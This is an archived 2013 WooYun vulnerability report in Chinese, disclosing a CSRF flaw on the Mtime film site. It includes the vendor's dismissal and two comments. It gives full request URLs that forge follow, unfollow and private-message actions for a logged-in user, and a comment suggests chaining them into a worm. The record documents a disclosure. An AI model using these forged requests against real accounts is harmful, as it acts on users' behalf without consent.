当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-032778

漏洞标题:再续时光网csrf漏洞

相关厂商:时光网

漏洞作者: n0bele

提交时间:2013-07-30 13:45

修复时间:2013-07-30 14:01

公开时间:2013-07-30 14:01

漏洞类型:CSRF

危害等级:低

自评Rank:5

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-07-30: 细节已通知厂商并且等待厂商处理中
2013-07-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

因为觉得这网站还不错,又看了下.

详细说明:

直接get啥处理都没,
5875540为ID号
添加关注
http://service.mtime.com/Service/Twitter.msi?Ajax_CallBack=true&Ajax_CallBackType=Mtime.Service.Pages.TwitterService&Ajax_CallBackMethod=Follow&Ajax_CrossDomain=1&Ajax_RequestUrl=http%3A%2F%2Fmy.mtime.com%2Fapp%2Ft%2Fsearch%2Fuser%2F%3Fcontent%3D%25E4%25B8%258D%25E5%25BC%25BA%26searchtype%3D0%26usertype%3D0%26locationtype%3D0%26locationid%3D0%26sex%3D-1%26minage%3D0%26maxage%3D0&t=201372913162997346&Ajax_CallBackArgument0=5875540
取消关注
http://service.mtime.com/Service/Twitter.msi?Ajax_CallBack=true&Ajax_CallBackType=Mtime.Service.Pages.TwitterService&Ajax_CallBackMethod=UnFollow&Ajax_CrossDomain=1&Ajax_RequestUrl=http%3A%2F%2Fmy.mtime.com%2Fapp%2Ft%2Fsearch%2Fuser%2F%3Fcontent%3D%25E4%25B8%258D%25E5%25BC%25BA%26searchtype%3D0%26usertype%3D0%26locationtype%3D0%26locationid%3D0%26sex%3D-1%26minage%3D0%26maxage%3D0&t=201372913185796643&Ajax_CallBackArgument0=5875540
//发送短消息
http://service.mtime.com/Service/Message.msi?Ajax_CallBack=true&Ajax_CallBackType=Mtime.Service.Pages.MessageService&Ajax_CallBackMethod=SendUserMessageToNicknameCrossDomainByFlash&Ajax_CrossDomain=1&Ajax_RequestUrl=http%3A%2F%2Fmy.mtime.com%2Fapp%2Ft%2Ffollower%2F&t=201372915233312498&Ajax_CallBackArgument0=%E4%B8%8D%E5%BC%BA&Ajax_CallBackArgument1=111111111122222222222222

漏洞证明:

粉丝不在多,在于质量可靠

csrf.jpg

修复方案:

礼物奉上

版权声明:转载请注明来源 n0bele@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-07-30 14:01

厂商回复:

谢谢 n0bele,忽略的原因主要是:同一个用户会有关注数的上限,发送消息会有频率的控制,对于“水军”我们也会采取屏蔽IP等措施

最新状态:

暂无


漏洞评价:

评论

  1. 2013-07-30 14:08 | n0bele ( 普通白帽子 | Rank:220 漏洞数:45 | 无耻最寂寞)

    其实我想说,这个IP你们真心封不住的,配合下来个蠕虫会很没脾气

  2. 2013-07-30 15:20 | 小智 ( 实习白帽子 | Rank:33 漏洞数:5 | 低调低调,学习学习~)

    @n0bele 算了啦,人家都不着紧。其实很多加关注都有问题。只不过他利用价值不大。所以不值rank而已